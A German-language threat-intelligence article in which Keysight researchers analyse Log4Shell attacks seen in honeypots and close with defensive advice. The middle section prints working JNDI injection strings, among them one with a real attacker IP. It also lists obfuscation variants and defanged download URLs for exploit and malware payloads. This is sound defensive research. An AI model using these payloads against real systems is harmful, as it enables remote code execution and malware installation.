Ende des letzten Jahrs kam es zu den ersten Log4Shell-Angriffen. Die Experten des Keysight ATI Research Center haben die Angriffe auf die Log4j-Schwachstelle unter die Lupe genommen und genau analysiert. Hier beschreiben sie, was sie herausgefunden haben.
Die Angriffe auf die Log4j-Schwachstelle haben weltweit Alarm ausgelöst. Experten des Keysight ATI Research Center haben die Angriffe unter die Lupe genommen.
Keysight betreibt ein globales Honeypot-Netzwerk, um unter der Leitung unseres ATI Research Center (Application and Threat Intelligence) Trends bei bösartigen Aktivitäten im Internet zu verfolgen. Die ersten Log4Shell-Aktivitäten wurden am Freitag, dem 10. Dezember, gegen 6:00 Uhr UTC beobachtet. Seitdem analysieren wir die Aktivitäten, um die von Angreifern verwendeten Taktiken, Techniken und Verfahren (Tactics, Techniques, and Procedures, TTPs) besser zu verstehen und unsere Kunden zu schützen.
Der Log4Shell-Angriff wird in zwei Hauptphasen durchgeführt, an denen mehrere Hosts beteiligt sind. Im ersten Schritt wird eine Verbindung zu einem Webserver hergestellt, und über die HTTP-Verbindung wird eine Zeichenfolge gesendet, die geloggt wird. Diese Zeichenfolge löst eine Schwachstelle im Log4j-Java-Logging-Code aus, die den Opfer-Webserver dazu veranlasst, eine Binärdatei von einem zweiten Server herunterzuladen, die dann auf dem Opfer-Webserver mit den Rechten der Webanwendung ausgeführt wird. Nachdem die bösartige Binärdatei auf dem Opfersystem ausgeführt wurde, sind den Möglichkeiten im Grunde keine Grenzen gesetzt – zusätzliche Software kann heruntergeladen und ausgeführt werden, sie kann sich lateral bewegen, usw. Diese Ergebnisse sind je nach Malware-Kampagne sehr unterschiedlich und liegen außerhalb des Rahmens unserer Untersuchung.
Funktionsweise
Als erstes untersuchten wir die Verbindungen der ersten Stufe – die anfänglichen HTTP-Verbindungen. Diese kamen aus der ganzen Welt und wurden mit ziemlicher Sicherheit von Botnets gesendet; die geografische Verteilung der angreifenden IPs entsprach genau der geografischen Verteilung der Botnets. Brasilien, Russland und China spielten eine zentrale Rolle. Diese Phase des Angriffs ist sehr einfach und kann leicht von arglosen Laptops, IoT-Geräten und dergleichen gestartet werden.
In der nächsten Phase unserer Analyse untersuchten wir die Befehle, die die Angreifer ursprünglich gesendet hatten. JNDI (Java Naming and Directory Interface) ist eine Java-Funktion, mit der Objekte während der Laufzeit geladen und verwendet werden können. Der Log4j/Log4Shell-Angriff nutzt diese Funktion aus, indem er eine Log-Nachricht sendet, die einen Befehl zum Herunterladen von Malware enthält, in den meisten Fällen über LDAP. Die Zeichenfolge, die geloggt wird, sieht etwa so aus:
${ jndi:ldap:evilserver/path/malware }
Diese Log-Nachricht veranlasst JNDI, eine Verbindung zu evilserver herzustellen und /path/malware herunterzuladen, es als LDAP-Objekt zu interpretieren und auszuführen. Es wurden auch schon Downloads über andere Mechanismen, wie z. B. RMI (Java Remote Method Invocation), durchgeführt, aber LDAP ist bei weitem die häufigste Methode.
ldap://
4492
97 Prozent
ldaps://
57
1,2 Prozent
rmi://
33
0,71 Prozent
http://
4
0,08 Prozent
Das erste, was hier auffiel, war die geografische Verteilung der Malware-Server. Russland war mit zwei der drei wichtigsten Server ein Hauptherkunftsland. Danach folgt noch eine längere Liste mit Deutschland, USA und anderen Ländern. Bemerkenswert ist, dass sich der Server mit der Nummer 1 in dieser Stichprobe in Singapur befand, aber einem Unternehmen mit Sitz in Zypern gehörte. Praktischerweise wurden 60 Prozent der Top-Sites bereits in der Rap-Sheet-Datenbank von Keysight erfasst, da wir in letzter Zeit andere bösartige Aktivitäten von diesen Sites beobachtet hatten; sie waren in anderen Malware-Kampagnen verwendet worden. Das bedeutet auch, dass Kunden, die das Keysight-Produkt ThreatARMOR verwenden, automatisch vor diesen Websites geschützt sind, da wir die Verbindungen zu diesen Download-Servern in unserer Datenbank blockieren.
Anteil
IP
Land
35 Prozent
45.130.229.168
Singapore
19 Prozent
45.144.205.233
Russia
11 Prozent
195.54.160.149
Russia
8 Prozent
205.185.115.217
US
8 Prozent
81.30.157.43
Germany
5 Prozent
185.250.148.157
Moldova
4 Prozent
185.244.158.212
Ukraine
2 Prozent
167.172.44.255
US
2 Prozent
45.137.21.9
Bangladesh
2 Prozent
178.79.157.186
UK
1 Prozent
89.163.144.156
Germany
1 Prozent
163.172.157.143
France
Als Nächstes haben wir uns die tatsächlich gesendeten JNDI-Strings angesehen. Die Angreifer betreiben einen beträchtlichen Aufwand, um die Zeichenfolge zu verschleiern und so die Erkennung durch Perimeter-Sicherheitsvorrichtungen zu umgehen. Dies wurde in erster Linie durch die Manipulation der Groß-/Kleinschreibung von „jndi“ erreicht, wobei die Häufigkeit der Treffer in der nachstehenden Tabelle angegeben ist:
jndi:
5.496
78 Prozent
{jndi:${lower:
785
11,25 Prozent
${${::-j}${::-n}${::-d}${::-i}:$
450
6,4 Prozent
${${lower:j}${upper:n}${lower:d}${upper:i}:
120
1,7 Prozent
${${lower:${lower:jndi}}
58
1 Prozent
Eine sehr umfassende Beschreibung der Verschleierungstechniken hat Cloudflare in diesem Blog-Beitrag zusammengestellt. Vermutlich werden immer mehr Verschleierungstechniken eingesetzt, um Schutzmechanismen zu umgehen.
Als nächstes haben wir einige der in den LDAP-Download-Befehlen angegebenen Schadprogramme heruntergeladen und analysiert. Als Beispiel nehmen wir den Befehl
${jndi:ldap://45.83.193.150:1389/Exploit}
der auf einen zweiten Server (überprüft durch ldapsearch) –137.184.174.180 – verweist, bei dem es sich um einen Wordpress-Server handelt, der von einem ISP (DigitalOcean) gehostet wird. Höchstwahrscheinlich weiß der Eigentümer dieses Servers nichts von dem Exploit, der unter h__p://137.184.174.180:8082/Exploit.class gehostet wird.
Server auf dem der Exploit gehostet wird.
(Bild: Keysight Technologies)
Wenn wir auf diese Exploit.class zugreifen und sie mit Hilfe von Strings untersuchen, sehen wir Folgendes:
Zugriff auf Exploit.class.
(Bild: Keysight Technologies)
Dadurch wird unser Opferserver angewiesen, noch einen weiteren Abruf durchzuführen nach h__p://60.183.165.105/.l/log der eine Reihe von „ptyX“-Dateien enthält (es handelt sich um ELF-Binärdateien):
Download von ptyX-Dateien.
(Bild: Keysight Technologies)
Interessanterweise enthalten die ptyX-Binärdateien einige japanische Wörter:
Stand: 08.12.2025
Es ist für uns eine Selbstverständlichkeit, dass wir verantwortungsvoll mit Ihren personenbezogenen Daten umgehen. Sofern wir personenbezogene Daten von Ihnen erheben, verarbeiten wir diese unter Beachtung der geltenden Datenschutzvorschriften. Detaillierte Informationen finden Sie in unserer Datenschutzerklärung.
Einwilligung in die Verwendung von Daten zu Werbezwecken
Ich bin damit einverstanden, dass die Vogel IT-Medien GmbH, Max-Josef-Metzger-Straße 21, 86157 Augsburg, einschließlich aller mit ihr im Sinne der §§ 15 ff. AktG verbundenen Unternehmen (im weiteren: Vogel Communications Group) meine E-Mail-Adresse für die Zusendung von Newslettern und Werbung nutzt. Auflistungen der jeweils zugehörigen Unternehmen können hier abgerufen werden.
Der Newsletterinhalt erstreckt sich dabei auf Produkte und Dienstleistungen aller zuvor genannten Unternehmen, darunter beispielsweise Fachzeitschriften und Fachbücher, Veranstaltungen und Messen sowie veranstaltungsbezogene Produkte und Dienstleistungen, Print- und Digital-Mediaangebote und Services wie weitere (redaktionelle) Newsletter, Gewinnspiele, Lead-Kampagnen, Marktforschung im Online- und Offline-Bereich, fachspezifische Webportale und E-Learning-Angebote. Wenn auch meine persönliche Telefonnummer erhoben wurde, darf diese für die Unterbreitung von Angeboten der vorgenannten Produkte und Dienstleistungen der vorgenannten Unternehmen und Marktforschung genutzt werden.
Meine Einwilligung umfasst zudem die Verarbeitung meiner E-Mail-Adresse und Telefonnummer für den Datenabgleich zu Marketingzwecken mit ausgewählten Werbepartnern wie z.B. LinkedIN, Google und Meta. Hierfür darf die Vogel Communications Group die genannten Daten gehasht an Werbepartner übermitteln, die diese Daten dann nutzen, um feststellen zu können, ob ich ebenfalls Mitglied auf den besagten Werbepartnerportalen bin. Die Vogel Communications Group nutzt diese Funktion zu Zwecken des Retargeting (Upselling, Crossselling und Kundenbindung), der Generierung von sog. Lookalike Audiences zur Neukundengewinnung und als Ausschlussgrundlage für laufende Werbekampagnen. Weitere Informationen kann ich dem Abschnitt „Datenabgleich zu Marketingzwecken“ in der Datenschutzerklärung entnehmen.
Falls ich im Internet auf Portalen der Vogel Communications Group einschließlich deren mit ihr im Sinne der §§ 15 ff. AktG verbundenen Unternehmen geschützte Inhalte abrufe, muss ich mich mit weiteren Daten für den Zugang zu diesen Inhalten registrieren. Im Gegenzug für diesen gebührenlosen Zugang zu redaktionellen Inhalten dürfen meine Daten im Sinne dieser Einwilligung für die hier genannten Zwecke verwendet werden. Dies gilt nicht für den Datenabgleich zu Marketingzwecken.
Recht auf Widerruf
Mir ist bewusst, dass ich diese Einwilligung jederzeit für die Zukunft widerrufen kann. Durch meinen Widerruf wird die Rechtmäßigkeit der aufgrund meiner Einwilligung bis zum Widerruf erfolgten Verarbeitung nicht berührt. Um meinen Widerruf zu erklären, kann ich als eine Möglichkeit das unter https://contact.vogel.de abrufbare Kontaktformular nutzen. Sofern ich einzelne von mir abonnierte Newsletter nicht mehr erhalten möchte, kann ich darüber hinaus auch den am Ende eines Newsletters eingebundenen Abmeldelink anklicken. Weitere Informationen zu meinem Widerrufsrecht und dessen Ausübung sowie zu den Folgen meines Widerrufs finde ich in der Datenschutzerklärung.
Japanische Worte im Exploit Code.
(Bild: Keysight Technologies)
Das heißt übersetzt: Ich weiß nichts, nur was du weißt. Dieser Satz taucht häufig in Code auf, der aus der Mirai-Codebasis für Linux- und IOT-Botnets stammt, und ist eine Anspielung auf japanische Anime.
Der letzte Payload (h__p://159.89.182.117/wp-content/themes/twentyseventeen/ldm) ist ein Bash-Skript mit mehreren Verweisen auf TOR.
Die letzte Payload ist ein Bash-Skript mit mehreren Verweisen auf TOR.
(Bild: Keysight Technologies)
Base64-Kodierung wurde in großem Umfang als einfache Verschleierungstechnik verwendet, gefolgt von verschiedenen fragwürdigen Befehlen. Schauen wir uns einige konkrete Beispiele an.
1. Download und Ausführung von Binärdateien.
Wir beobachteten, dass Befehle an Log4j gesendet wurden, die etwa so aussahen:
Wir konnten diesen speziellen Code nicht herunterladen, da der Server möglicherweise offline genommen wurde. Aber es ist leicht zu erkennen, wie der Exploit vorging: Er lud offensiven Code in das Verzeichnis /tmp/x86 herunter, den er dann ausführbar machte und ausführte.
2. Diebstahl von AWS-Zugangsdaten
Hinweis: In einigen Beispielen wie diesem entfernen oder verschleiern wir einige Hosts oder Domänen, die an einer Angriffskette beteiligt waren, von denen wir aber annehmen, dass sie unwissentliche Opfer waren.
6. Und was wäre eine Angriffswelle ohne den gelegentlichen Powershell-Aufruf zum Herunterladen und Ausführen von Angriffen auf anfällige Windows-Systeme?
Wir waren nicht in der Lage, dieses PHP herunterzuladen, aber es ist bemerkenswert, dass Nicht-Linux-Systeme gezielt angegriffen werden.
Beobachtungen
Aktivität, gemessen vom Keysight ATI Research Center.
(Bild: Keysight Technologies)
Bei den bösartigen Binärdateien, die wir herunterladen konnten, war Cryptojacking wenig überraschend sehr verbreitet. Wir haben viele der üblichen Tricks und Taktiken beobachtet, die Kryptojacker anwenden, um mehr Systemressourcen für das Cryptomining bereitzustellen, z. B. das Abschalten von unkritischen Systemdiensten (und Diensten mit PID > 301) und die gezielte Suche nach konkurrierenden Cryptominern und deren Abschaltung. Es gibt keine Ehre unter Dieben!
Obwohl die Ausnutzung der Log4j-Schwachstelle fast trivial einfach ist, sehen wir ziemlich ausgereifte Malware-Modelle– wie z. B. Proxy-Kompatibilität, Einfügen von SSH-Schlüsseln und Verwendung von Cron-Jobs zur Planung von Befehlen und Netzwerkverbindungen nach der ersten Infektion, um eine Entdeckung zu vermeiden.
Was bedeutet das für die Unternehmens-IT? Die Nutzung von Log4j ist weit verbreitet, es gibt Milliarden von Java-fähigen Systemen. Es ist trivial einfach auszunutzen, und wir sahen eine sofortige und zunehmende Aktivität, sobald der Proof of Concept Code veröffentlicht wurde.
Hier sind die wichtigsten Strategien, um Unternehmen sowohl kurz- als auch langfristig besser zu schützen.
1. Aktualisieren Sie Ihre Web Application Firewalls (WAFs) und andere Perimeter-Geräte sofort, um sowohl eingehende als auch ausgehende Log4j-Angriffe zu stoppen; eingehende, um Ihre Server zu schützen, und ausgehende, für den Fall, dass Sie Systeme haben, die unwissentlich zu einem Botnet gehören. Dies kann kurzfristig einen gewissen Schutz bieten, bis Sie in der Lage sind, alle Ihre Systeme zu aktualisieren. Seien Sie sich jedoch bewusst, dass es einen Wettlauf zwischen bösen Akteuren und Sicherheitsanbietern geben wird, um die Verschleierung zu verbessern und zu überwinden, so dass dies wahrscheinlich nur eine teilweise und vorübergehende Lösung ist. Verwenden Sie ein Tool zur Simulation von Sicherheitsverletzungen und Angriffen wie den Threat Simulator von Keysight, um Ihren WAF/NGFW-Schutz vor Log4j-Angriffen zu bewerten.
2. Aktualisieren Sie sowohl die externen als auch die internen Systeme, und zwar in dieser Reihenfolge. Jede exponierte IP-Adresse wird derzeit mit Log4Shell-Verbindungsversuchen bombardiert. Sobald ein Angreifer jedoch Fuß gefasst hat, sei es durch einen Log4Shell-Angriff auf einen externen Server oder einen anderen Mechanismus, wird er sich auf interne Systeme stürzen.
3. Überprüfen Sie jedes Gerät in Ihrem Netzwerk auf den Aktualisierungsstatus. Das heißt, jeder Server, Drucker und alles andere, das eine eingehende TCP-Verbindung akzeptiert (insbesondere eine Webverbindung) – und wenden Sie sich an den Hersteller, um nach Updates für Log4j zu suchen. Java ist auf Geräten wie Mobiltelefonen, Blu-ray-Playern, Druckern, Netzwerkgeräten und allem anderen weit verbreitet. Wenn Sie ein paar Tage ohne etwas leben können, schalten Sie es aus, bis Sie Informationen von Ihrem Hersteller erhalten.
4. Überwachen Sie Ihre Netzwerkaktivitäten. Achten Sie auf unerwartete ausgehende Verbindungen, insbesondere von Geräten, die über das Internet zugänglich sind. Zero-Trust wäre in dieser Situation natürlich ideal, aber wenn Sie keine vollständige Zero-Trust-Implementierung durchführen können, deaktivieren Sie alle ausgehenden Verbindungen von Geräten, die mit dem Internet verbunden und nicht kritisch sind. Selbst wenn Sie ein anfälliges System haben, an das jemand einen bösartigen JNDI-Befehl weiterleiten kann, der Abruf der Malware aber blockiert ist, bietet dies einen gewissen Schutz.
5. Ziehen Sie Geoblocking in Betracht, um Ihr Risiko zu minimieren. Wenn Sie über ein Gerät wie eine NGFW oder ein Threat Intelligence Gateway (wie den ThreatARMOR von Keysight) verfügen, das Geoblocking implementieren kann, sollten Sie dies tun. Blockieren Sie sowohl eingehende als auch ausgehende Verbindungen in Länder, die für Ihr Unternehmen nicht von Bedeutung sind. Wenn Sie feststellen, dass Verbindungen blockiert werden, können Sie diese untersuchen und nach und nach auf eine Whitelist setzen, aber jetzt sollten Sie das Risiko minimieren.
6. Aktualisieren Sie alle Ihre Server auf Log4j 2.15.0. Und zwar alle. Denn wenn Sie nur einen verwundbaren Server haben, wird er gefunden werden.
Über den Autor: Scott Register hat mehr als 15 Jahre Erfahrung in der Leitung von Produktmanagement-Aktivitäten für globale Technologieunternehmen und ist derzeit Vice President des Bereichs Security Solutions bei Keysight. Er hat einen B.S.- und einen M.S.-Abschluss in Informatik vom Georgia Institute of Technology und war auch Mitglied einer Forschungsabteilung des Instituts.
:quality(80)/p7i.vogel.de/wcms/77/96/77965e389847a783a89d16ec537bbdfd/0127091202v1.jpeg "Enterprise Network Firewalls tragen entscheidend zur Absicherung von Unternehmensnetzwerken bei. (Bild: © Bounty – stock.adobe.com / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/8a/d7/8ad77a356a43b3c02e85ce72e1f6c2c3/0127092578v1.jpeg "Security Awareness sorgt für eine Sicherheitskultur, in der Mitarbeitende eine aktive und informierte Verteidigungslinie bilden. (Bild: © photon_photo – stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/d7/14/d714ac0a936f45496f02ffb57415bef2/0127092564v1.jpeg "Endpoint-Protection-Plattformen entwickeln sich zu einem unverzichtbaren Bestandteil der Cyberresilienz moderner Organisationen. (Bild: © Dusty – stock.adobe.com / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/30/27/3027664b0fb0bc9c398378e320ef390b/0128993714v2.jpeg "Cyberkriminelle sind aktiver denn je. Diese deutschen Unternehmen sind ihnen 2026 bereits zum Opfer gefallen. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/1d/db/1ddbdc9047cbd3cd27d7cb0efca62bc4/0128713610v2.jpeg "Am 25. Dezember 2025 griffen mutmaßlich japanische Cyberkriminelle Adobe-ColdFusion-Server, mit dem Ziel, Zugriffe zu kapern, um diese dann zu verkaufen. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/e3/48/e348498d4582bb6d2bd6993b70462a5b/0129264709v2.jpeg "Bei der Microsoft-365-Security gibt es viele blinde Flecken, auf die IT-Verantwortlichen in Unternehmen achten müssen. (Bild: Dall-E / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/3c/5c/3c5c6e99bcdad07637fea060dc2eab27/0127436898v1.jpeg "Der Autor: Alexander Waldmann ist Vice President bei Applause (Bild: Applause)")
:quality(80)/p7i.vogel.de/wcms/22/5d/225d1d7930c9090fe8fbf68e9d3465c2/0129163513v2.jpeg "Betroffen von der kritischen Schwachstelle EUVD-2026-4712 / CVE-2026-24858 sind die Produkte FortiOS, FortiManager, FortiAnalyzer, FortiProxy und FortiWeb. Die Sicherheitslücke erlaubt es Angreifern, sich über die FortiCloud-SSO-Anmeldung auf anderen Geräten unautorisiert anzumelden. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/24/aa/24aad994e872a642db8ce5e566b2ff5a/0128652115v2.jpeg "Mit Agentic AI wollen Cyberkriminelle Angriffe effizienter durchführen, um ihren ROI zu erhöhen. (Bild: KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/9a/22/9a22abecd3b81745aafb5167c9a4eed5/0129101394v1.jpeg "OPSI wird nach dem WSUS-Ende zur Open-Source-Alternative und verwaltet Windows, Linux und macOS zentral mit automatischen Updates und Echtzeit-Status. Mehr in Text, Bildergalerie und Video (Tool-Tipp 38). (Bild: © Irene Kulinchyk - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/46/86/4686355223b7afc15b0ec2dcc54a5e58/0128882706v1.jpeg "Die Risiken der digitalen Erpressbarkeit: Genügt ein Klick, um Europa ins digitale Dunkel zu führen? (Bild: frei lizenziert Pete Linforth)")
:quality(80)/p7i.vogel.de/wcms/c6/7e/c67ee3c3d518dfe5a48378e20a95fde5/0129075400v1.jpeg "Clickjacking nutzt Autofill aus um an Zugangsdaten zu gelangen, aber die Deaktivierung der Funktion sorgt eher für mehr Probleme! Endpoint-Security, MFA und URL-Abgleich schützen wirksamer. (Bild: © Montri - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/2c/7f/2c7f325ab87e8cde7456fb75e3fd2e0b/0128865641v2.jpeg "Die Code-Injection-Sicherheitslücke in PowerPoint von 2009 ermöglicht es Angreifern, durch speziell gestaltete PowerPoint-Dateien beliebigen Code auszuführen. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/d4/df/d4dfa5d473ecbb140447fb4755cab804/0129131184v2.jpeg "Bundesinnenminister Alexander Dobrindt (CSU) will härter gegen hybride Angriffe durch staatliche Geheimdienste vorgehen. (Bild: @ BMI / Henning Schacht)")
:quality(80)/p7i.vogel.de/wcms/0c/1d/0c1d11fd4db504d22e5e49ede52d9f70/0128678308v1.jpeg "WPS ist ein Standard der Wi-Fi Alliance zur vereinfachten Konfiguration der Endgeräte in einem verschlüsselten WLAN. (Bild: Oksana Latysheva)")
:quality(80)/p7i.vogel.de/wcms/7b/1b/7b1b6408a02a8308f697aee84799029c/0128685819v1.jpeg "Das Dynamic Host Configuration Protocol ist im Netzwerk für die automatische Zuweisung der IP-Netzwerkkonfiguration zuständig. (Bild: @alemedia via Canva: Visual Suite for Everyone)")
:quality(80)/p7i.vogel.de/wcms/c6/f9/c6f9ca1f06e343a3a49c5f065438b451/0126593157v1.jpeg "Ein Infostealer ist eine auf Datendiebstahl spezialisierte Schadsoftware. (Bild: frei lizenziert)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804272/original.jpg "XDR (Extended Detection and Response) erkennt Angriffe auf Endpoints frühzeitig. (Darwin Laganzon)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804284/original.jpg "Eine wirksame Notfallvorsorge muss auch fortschrittliche Attacken vorhersehen. (Tumisu)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801554/original.jpg "Der Schutz von Operational Technology erfordert spezielle Security-Maßnahmen. (Gerd Altmann)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801534/original.jpg "Security-by-Design ist bei Cloud-Apps besonders wichtig. (Werner Moser)")
:quality(80)/p7i.vogel.de/wcms/a8/65/a865e4df4f561ff9c34094e328751cee/0122620318v2.jpeg "Mirai ist eine Schadsoftware, die auf schlecht abgesicherte IoT-Geräte abzielt. (©beebright - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/76/ad/76adbebdaff211444d6452686b72bdc8/0123906805v1.jpeg "Das Botnetz „Ballista“ zielt auf Router des Herstellers TP-Link ab und verbreitet sich über das Internet. Bislang sind über 6000 Geräte infiziert. (Bild: Midjourney / KI-generiert)")